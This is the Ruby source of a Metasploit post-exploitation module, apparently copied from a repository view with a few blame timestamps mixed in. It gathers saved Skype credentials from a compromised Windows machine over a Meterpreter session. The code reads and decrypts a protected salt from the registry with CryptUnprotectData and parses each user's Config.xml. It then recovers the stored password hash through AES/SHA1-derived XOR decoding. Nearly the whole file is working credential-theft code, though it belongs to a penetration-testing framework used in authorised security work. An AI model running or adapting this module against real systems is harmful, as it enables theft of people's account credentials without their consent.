metasploit-framework/modules/post/windows/gather/credentials/skype.rb

180 lines
5.2 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex'
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Post::Windows::Registry
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather Skype Saved Password Hash Extraction',
'Description' => %q{ This module finds saved login credentials
for the Windows Skype client. The hash is in MD5 format
that uses the username, a static string "\nskyper\n" and the
password. The resulting MD5 is stored in the Config.xml file
for the user after being XOR'd against a key generated by applying
2 SHA1 hashes of "salt" data which is stored in ProtectedStorage
using the Windows API CryptProtectData against the MD5 },
'License' => MSF_LICENSE,
'Author' => [
'mubix', # module
'hdm' # crypto help
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'References' => [
['URL', 'http://www.recon.cx/en/f/vskype-part2.pdf'],
['URL', 'http://insecurety.net/?p=427'],
['URL', 'https://github.com/skypeopensource/tools']
]
))
end
# To generate test hashes in ruby use:
=begin
require 'openssl'
username = "test"
passsword = "test"
hash = Digest::MD5.new
hash.update username
hash.update "\nskyper\n"
hash.update password
puts hash.hexdigest
=end
def decrypt_reg(data)
rg = session.railgun
pid = session.sys.process.getpid
process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
mem = process.memory.allocate(512)
process.memory.write(mem, data)
if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86"
addr = [mem].pack("V")
len = [data.length].pack("V")
ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
len, addr = ret["pDataOut"].unpack("V2")
else
addr = [mem].pack("Q")
len = [data.length].pack("Q")
ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
len, addr = ret["pDataOut"].unpack("Q2")
end
return "" if len == 0
return process.memory.read(addr, len)
end
# Get the "Salt" unencrypted from the registry
def get_salt
print_status "Checking for encrypted salt in the registry"
vprint_status "Checking: HKCU\\Software\\Skype\\ProtectedStorage - 0"
rdata = registry_getvaldata('HKCU\\Software\\Skype\\ProtectedStorage', '0')
print_good("Salt found and decrypted")
return decrypt_reg(rdata)
end
# Pull out all the users in the AppData directory that have config files
def get_config_users(appdatapath)
users = []
dirlist = session.fs.dir.entries(appdatapath)
dirlist.shift(2)
dirlist.each do |dir|
begin
session.fs.file.stat(appdatapath + "\\#{dir}" + '\\config.xml')
rescue Rex::Post::Meterpreter::RequestError
vprint_error "Config.xml not found in #{appdatapath}\\#{dir}\\"
next
end
print_good "Found Config.xml in #{appdatapath}\\#{dir}\\"
users << dir
end
return users
end
def parse_config_file(config_path)
hex = ""
configfile = read_file(config_path)
configfile.each_line do |line|
if line =~ /Credentials/i
hex = line.split('>')[1].split('<')[0]
end
end
return hex
end
def decrypt_blob(credhex, salt)
# Convert Config.xml hex to binary format
blob = [credhex].pack("H*")
# Concatinate SHA digests for AES key
2014-06-23 19:39:06 +00:00
sha = Digest::SHA1.digest("\x00\x00\x00\x00" + salt) + Digest::SHA1.digest("\x00\x00\x00\x01" + salt)
aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
aes.encrypt
aes.key = sha[0,32] # Use only 32 bytes of key
final = aes.update([0].pack("N*") * 4) # Encrypt 16 \x00 bytes
final << aes.final
xor_key = final[0,16] # Get only the first 16 bytes of result
vprint_status("XOR Key: #{xor_key.unpack("H*")[0]}")
decrypted = []
# Use AES/SHA crypto for XOR decoding
(0...16).each do |i|
decrypted << (blob[i].unpack("C*")[0] ^ xor_key[i].unpack("C*")[0])
end
return decrypted.pack("C*").unpack("H*")[0]
end
def get_config_creds(salt)
users = []
appdatapath = expand_path("%AppData%") + "\\Skype"
print_status ("Checking for config files in %APPDATA%")
users = get_config_users(appdatapath)
if users.any?
users.each do |user|
print_status("Parsing #{appdatapath}\\#{user}\\Config.xml")
credhex = parse_config_file("#{appdatapath}\\#{user}\\config.xml")
if credhex == ""
print_error("No Credentials3 blob found for #{user} in Config.xml skipping")
next
else
hash = decrypt_blob(credhex, salt)
print_good "Skype MD5 found: #{user}:#{hash}"
end
end
else
print_error "No users with configs found. Exiting"
end
end
def run
salt = get_salt
if salt != nil
creds = get_config_creds(salt)
else
2014-06-23 19:34:07 +00:00
print_error "No salt found. Cannot continue without salt, exiting"
end
end
end